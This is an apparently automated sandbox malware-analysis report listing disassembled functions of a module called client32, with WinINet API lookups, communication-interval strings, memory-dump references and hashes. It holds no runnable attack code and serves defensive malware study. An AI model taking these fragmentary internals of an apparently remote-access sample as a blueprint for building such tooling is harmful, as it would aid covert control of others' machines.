                                                                                                                                        • Instruction Fuzzy Hash: 96F05E76605628AFC720DF98D944E9B77E8EB88B60F00851AFA1A97601D774EC50CBA0
                                                                                                                                        Function 688F4E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 688F4E94
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 688F4EC1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpQueryInfoA
                                                                                                                                        • API String ID: 199729137-45432230
                                                                                                                                        • Opcode ID: 9a454726ed185b8cbccddd0824746c392b7fe99f496e474d1b13dc53543700c1
                                                                                                                                        • Instruction ID: 77eed3aca63ca278f8053e0736ca6804eee93d9e2c5012c1c2717eeec1aae964
                                                                                                                                        • Opcode Fuzzy Hash: 9a454726ed185b8cbccddd0824746c392b7fe99f496e474d1b13dc53543700c1
                                                                                                                                        • Instruction Fuzzy Hash: 92F03A72644228AFC720DF95D848E9B77E8EF88761F00C81AB95AD7600D670E850CFA0
                                                                                                                                        Function 688F4ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 688F4EE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB3E2,00000000,00000000,00000000,00000000,00000000), ref: 688F4F11
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpSendRequestA
                                                                                                                                        • API String ID: 199729137-4278235638
                                                                                                                                        • Opcode ID: 8903187696bffa419adc156cfbe03415415e32547fbeb9c64311663d7cd09d0a
                                                                                                                                        • Instruction ID: 3855771dc5fb0e9285ee9412430e43671f3cff4bb1d84bfb9e80f8eee514ec7a
                                                                                                                                        • Opcode Fuzzy Hash: 8903187696bffa419adc156cfbe03415415e32547fbeb9c64311663d7cd09d0a
                                                                                                                                        • Instruction Fuzzy Hash: 65F01776644328ABC720DFA8D844E9B77A8EB88761B008A1AB91697600D770E854CBA0
                                                                                                                                        Function 688F4F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 688F4F34
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB614), ref: 688F4F61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpSendRequestExA
                                                                                                                                        • API String ID: 199729137-1584202490
                                                                                                                                        • Opcode ID: 91c03d5d3212b1ca1d0628356823b8f301923eb246795bf8d205579f7949b648
                                                                                                                                        • Instruction ID: 60ab29f623f37cf96ebc53d89a2733fa431b9bb24e0459aeaba602de874064f2
                                                                                                                                        • Opcode Fuzzy Hash: 91c03d5d3212b1ca1d0628356823b8f301923eb246795bf8d205579f7949b648
                                                                                                                                        • Instruction Fuzzy Hash: D6F03A76605228AFC720DF94E944EAB77A9EF88B60F00451AF91A97600D670E811CBF1
                                                                                                                                        Function 68906FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68906FDE
                                                                                                                                        • ctl_pittmanfunc.HTCTL32(?,00000001,?,00000050,?,00000004,00000000,00000000,?,00000000,00000050), ref: 68907018
                                                                                                                                          • Part of subcall function 689062B0: _memset.LIBCMT ref: 689062F6
                                                                                                                                          • Part of subcall function 689062B0: SetLastError.KERNEL32(00000057), ref: 689065A3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$ErrorLastctl_pittmanfunc
                                                                                                                                        • String ID: P
                                                                                                                                        • API String ID: 2926529296-3110715001
                                                                                                                                        • Opcode ID: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
                                                                                                                                        • Instruction ID: 27e14a250d4f272dd3a8abc50eda8ef963175b70e473abe5b19119e1253a78f6
                                                                                                                                        • Opcode Fuzzy Hash: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
                                                                                                                                        • Instruction Fuzzy Hash: 36F0BDB5A4430CABDB14CFD4DC82FAE77B9AB48700F104119FA18AB3C4D7B0A950CBA5
                                                                                                                                        Function 688FC4B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FC4F9
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: ID=%d$UID=%s
                                                                                                                                        • API String ID: 3180605519-586864749
                                                                                                                                        • Opcode ID: 0b002f21a73f4ce13a776eeaea19d474af2441ecbfddc3b820def18c42284b78
                                                                                                                                        • Instruction ID: d19645f3a08a25393436edcf2de1efd99a18dffe8346f651ced6c88e931503dc
                                                                                                                                        • Opcode Fuzzy Hash: 0b002f21a73f4ce13a776eeaea19d474af2441ecbfddc3b820def18c42284b78
                                                                                                                                        • Instruction Fuzzy Hash: F6F08C3A540128BBDB029A59CC00BBF77ACDFA6164F848055FD2897601DB31EA01C7E6
                                                                                                                                        Function 688F4B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 688F4BA4
                                                                                                                                        • SetLastError.KERNEL32(00000078,000000C8,?,688FB53C,00000000,0000002B,?,?), ref: 688F4BCD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetQueryOptionA
                                                                                                                                        • API String ID: 199729137-3310327128
                                                                                                                                        • Opcode ID: 5a9e6b8317ca660a9f5ee8d288abacc52bc6fe497b36f1d614e514ec72a28478
                                                                                                                                        • Instruction ID: 7c9aa59e82d3abbf4eb63174d460ab1a7593ba020f4f3ef310b802ce2de18569
                                                                                                                                        • Opcode Fuzzy Hash: 5a9e6b8317ca660a9f5ee8d288abacc52bc6fe497b36f1d614e514ec72a28478
                                                                                                                                        • Instruction Fuzzy Hash: 5FF08272648628AFC760CF94D984F5B77E8FB88761F40481AF946D7640C670F850CBA0
                                                                                                                                        Function 688F4BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F4BF4
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4C1D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetReadFile
                                                                                                                                        • API String ID: 199729137-1824561397
                                                                                                                                        • Opcode ID: 949fd257769671bf04c32832915aafb983cec1cec51ddf5c49ae78dcae8f44e0
                                                                                                                                        • Instruction ID: 1b64592be10525374af37b3bf316e60d19025b0f70a04901711a68d62c3a352d
                                                                                                                                        • Opcode Fuzzy Hash: 949fd257769671bf04c32832915aafb983cec1cec51ddf5c49ae78dcae8f44e0
                                                                                                                                        • Instruction Fuzzy Hash: A5F08272604228AFC720CF94D944F9B73E8FB88760F40881AF946D7640C6B0F810CFA0
                                                                                                                                        Function 688F4B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F4B54
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4B7D
                                                                                                                                        Strings
                                                                                                                                        • InternetQueryDataAvailable, xrefs: 688F4B4E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetQueryDataAvailable
                                                                                                                                        • API String ID: 199729137-452555236
                                                                                                                                        • Opcode ID: 7c10e2ffc64b051cd1a5cbfb8976f241fd8ad774f72c15bad101a759fdf51ad2
                                                                                                                                        • Instruction ID: 1e3998b116682f80c5222ac3fc0551d245549bf20099de2797206368f01b3e6a
                                                                                                                                        • Opcode Fuzzy Hash: 7c10e2ffc64b051cd1a5cbfb8976f241fd8ad774f72c15bad101a759fdf51ad2
                                                                                                                                        • Instruction Fuzzy Hash: 58F05E72605228AFC760DF94DA44E5B77ACEB88B50F40481AF95697641C670F810CFA0
                                                                                                                                        Function 688F4DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 688F4DE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,688F9BCE,?,?,?,?), ref: 688F4E0D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetWriteFile
                                                                                                                                        • API String ID: 199729137-2273844942
                                                                                                                                        • Opcode ID: 235ffbc4b6ce268548669b21bd0ee716bc105eb761056a5e3bdf554bd8ab295d
                                                                                                                                        • Instruction ID: 39e1c47cb889a03db2194c1ed8f9fc9fcb7f99bef766e265dd0834f4d7225fe5
                                                                                                                                        • Opcode Fuzzy Hash: 235ffbc4b6ce268548669b21bd0ee716bc105eb761056a5e3bdf554bd8ab295d
                                                                                                                                        • Instruction Fuzzy Hash: D2F08272614328AFC730DF95D844E5B73E8EB88760F00881AF956D7640C671EC10CFA0
                                                                                                                                        Function 688F4D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 688F4D44
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB392,00000000,0000002B,?,?), ref: 688F4D6D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetSetOptionA
                                                                                                                                        • API String ID: 199729137-1247460590
                                                                                                                                        • Opcode ID: e186eb1667e206f8d0f61adac6b5fb00c15ac7ea7bacff02dc9707ec627f314f
                                                                                                                                        • Instruction ID: 79f51e48a5062ac51bae4a24f24477403dfdecf36dd91d215a5becd4ad0b1f12
                                                                                                                                        • Opcode Fuzzy Hash: e186eb1667e206f8d0f61adac6b5fb00c15ac7ea7bacff02dc9707ec627f314f
                                                                                                                                        • Instruction Fuzzy Hash: A1F08272605628AFC730DF94D944E5B73E8EB88B50F00481AFA5AD7641C671E810CBA0
                                                                                                                                        Function 688F6730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F6757
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        Strings
                                                                                                                                        • CONFIG_UPDATE - comms manage packet interval: %u secs, xrefs: 688F675F
                                                                                                                                        • CMPI, xrefs: 688F6740
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64strtoxl
                                                                                                                                        • String ID: CMPI$CONFIG_UPDATE - comms manage packet interval: %u secs
                                                                                                                                        • API String ID: 2058942787-1775076250
                                                                                                                                        • Opcode ID: 51c4d5af05a33c1261f2f8aa2996f571f67704f68bf720f4b1be8a4a62fa6477
                                                                                                                                        • Instruction ID: 01175e1c48092ffa18a97bed7ea8af49fa14903a3a1e895fd76c06c91da7a95a
                                                                                                                                        • Opcode Fuzzy Hash: 51c4d5af05a33c1261f2f8aa2996f571f67704f68bf720f4b1be8a4a62fa6477
                                                                                                                                        • Instruction Fuzzy Hash: D3E0D8CDD882603AF93123783C45B7B28590F637ADFC40674F956A9192F746DA5242F3
                                                                                                                                        Function 688F5530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(6893A188,00000000), ref: 688F5575
                                                                                                                                        Strings
                                                                                                                                        • NOT updating comms interval to %u secs (override: %u secs), xrefs: 688F554B
                                                                                                                                        • Updating comms interval to %u secs, xrefs: 688F555C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlocked
                                                                                                                                        • String ID: NOT updating comms interval to %u secs (override: %u secs)$Updating comms interval to %u secs
                                                                                                                                        • API String ID: 367298776-3363603740
                                                                                                                                        • Opcode ID: d2c50684de84f32a1d3804fa8357a494378919c93a77af6530b9fed2e4274400
                                                                                                                                        • Instruction ID: e895fc4007c78f7a95b41d774fffe513b7915a523566c538feb2858313c79811
                                                                                                                                        • Opcode Fuzzy Hash: d2c50684de84f32a1d3804fa8357a494378919c93a77af6530b9fed2e4274400
                                                                                                                                        • Instruction Fuzzy Hash: 53E09A72E41E396BDA3015DEBC08AAB3A4C8F855FAF804432FC0DA2540EA20D90182E2
                                                                                                                                        Function 688F4D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 688F4D94
                                                                                                                                        • SetLastError.KERNEL32(00000078,025E2B64,?,688FB267,00000000,688F6BD0), ref: 688F4DB5
                                                                                                                                        Strings
                                                                                                                                        • InternetSetStatusCallback, xrefs: 688F4D8E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetSetStatusCallback
                                                                                                                                        • API String ID: 199729137-894424467
                                                                                                                                        • Opcode ID: 98c0893ab02ab27aa3e4553f1d8343399f002c8144a71dcc2bab210291a4c33f
                                                                                                                                        • Instruction ID: b02d74a2369e256e2a0aac52ecb0bf3eb32c8036bae33b1375749c865d52f5a6
                                                                                                                                        • Opcode Fuzzy Hash: 98c0893ab02ab27aa3e4553f1d8343399f002c8144a71dcc2bab210291a4c33f
                                                                                                                                        • Instruction Fuzzy Hash: 96E06532944734AFC730AF98D848A96B7F8EB54761F00482BE985D7600D671E844CBD0
                                                                                                                                        Function 688F4C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F4C44
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB677,?), ref: 688F4C61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
